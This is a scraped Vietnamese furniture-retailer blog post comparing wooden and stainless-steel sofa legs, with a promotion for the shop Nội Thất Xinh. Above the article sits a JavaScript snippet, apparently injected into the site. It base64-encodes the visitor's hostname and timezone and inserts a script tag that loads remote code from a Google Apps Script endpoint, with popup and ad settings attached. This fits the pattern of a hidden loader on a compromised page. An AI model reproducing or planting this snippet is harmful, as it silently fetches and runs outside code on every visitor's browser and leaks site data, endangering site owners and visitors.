var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Tư vấn chọn chất liệu chân bộ sofa phòng khách

Chân bộ sofa phòng khách luôn là một trong những bộ phận không thể nào thiếu. Chân của sofa cho phòng khách cũng có nhiều kiểu dáng và được làm từ nhiều các chất liệu khác nhau đấy nhé.

Bạn đã biết chọn chân bộ sofa phòng khách làm bằng chất liệu gì chưa?

Vai trò của chân ghế sofa phòng khách

Chân ghế sofa phòng khách cũng như nhiều bộ phận khác luôn đóng vai trò quan trọng, góp phần tạo nên bộ sofa hoàn chỉnh hơn. Chân ghế nâng đỡ toàn bộ sản phẩm, tạo sự thoải mái và an toàn cho người ngồi.

Ngoài việc nâng đỡ cho sofa thì chân ghế còn đem lại giá trị thẩm mĩ cao. Tùy kiểu dáng chân ghế mà cũng quyết định không nhỏ đến vẻ đẹp của bộ sofa cho không gian đấy nhé. Chân ghế của từng loại sofa da Hà Nội hay sofa vải, sofa gỗ cũng sẽ có sự khác nhau.

chọn chất liệu chân bộ ghế sofa phòng khách
Chân bộ sofa giúp nâng đỡ sản phẩm, tạo an toàn và đem lại giá trị về mặt thẩm mĩ

Lựa chọn chất liệu chân bộ sofa phòng khách

Chất liệu làm chân ghế sofa phòng khách có nhiều loại, trong bài hôm nay chúng ta sẽ đề cập đến hai loại được nhiều người chọn nhiều nhất là chân gỗ và chân inox.

Với ghế sofa làm bằng chân gỗ có nhiều kiểu dáng, thường sẽ được phun sơn bên ngoài. Chất liệu gỗ làm chân ghế có thể là gỗ sồi, gỗ óc chó, gỗ thông… Ưu điểm của chân gỗ ghế sofa đó là chắc chắn, tạo giá trị thẩm mĩ cao, thân thiện môi trường, có nhiều các kiểu dáng khác nhau. Tuy nhiên khi mua sofa chân gỗ bạn nên chọn loại sofa cao cấp để chất liệu gỗ làm chân đảm bảo là loại tốt, không bị cong vênh, mối mọt.

chọn chất liệu chân bộ ghế sofa phòng khách
Ghế sofa chân gỗ nhiều kiểu dáng, an toàn sức khỏe, đem giá trị thẩm mĩ cao và bạn nên chọn loại sofa chân gỗ cao cấp

Với chân ghế sofa làm bằng chất liệu inox cũng có nhiều kiểu dáng khác nhau. Ưu điểm của sofa chân inox đó là nó có thể chịu được lực lớn hơn so với chân gỗ, đem lại vẻ đẹp sang và trẻ trung, không bị gỉ, không bị oxy hóa, không độc hại. Tuy nhiên chân inox lại dễ làm xước sàn nhà nếu như bạn không cẩn thận.

chọn chất liệu chân bộ ghế sofa phòng khách
Ghế sofa chân inox chịu lực tốt, không gỉ, đa mẫu mã, trẻ trung và hiện đại

Lựa chọn sofa chân gỗ hay chân inox đều có các đặc điểm riêng. Chọn loại nào tùy thuộc vào từng gia chủ, từng gia đình nhé, mỗi loại đều đem lại cho bạn một bộ sofa đẹp và không gian sang nhất. Các loại chân ghế đều dễ hợp cùng bàn trà, thảm sofa. Tất nhiên khi bài trí cùng thảm sofa thì khi đặt chúng ta phải chú ý để chân ghế không làm ảnh hưởng đến chất lượng bề mặt thảm.

Mua sofa phòng khách với chân ghế đẹp sang tại Nội Thất Xinh

Tại Nội Thất Xinh các loại ghế sofa có nhiều kiểu dáng chân ghế khác nhau cho quý khách chọn lựa. Mỗi loại chân ghế sofa đều có các ưu điểm khác nhau. Khi đi mua quý khách có thể cân nhắc để chọn lựa được loại chân ghế sofa thích hợp nhất. Đội ngũ nhân viên Nội Thất Xinh sẽ tư vấn để quý khách có sự chọn lựa tốt nhất.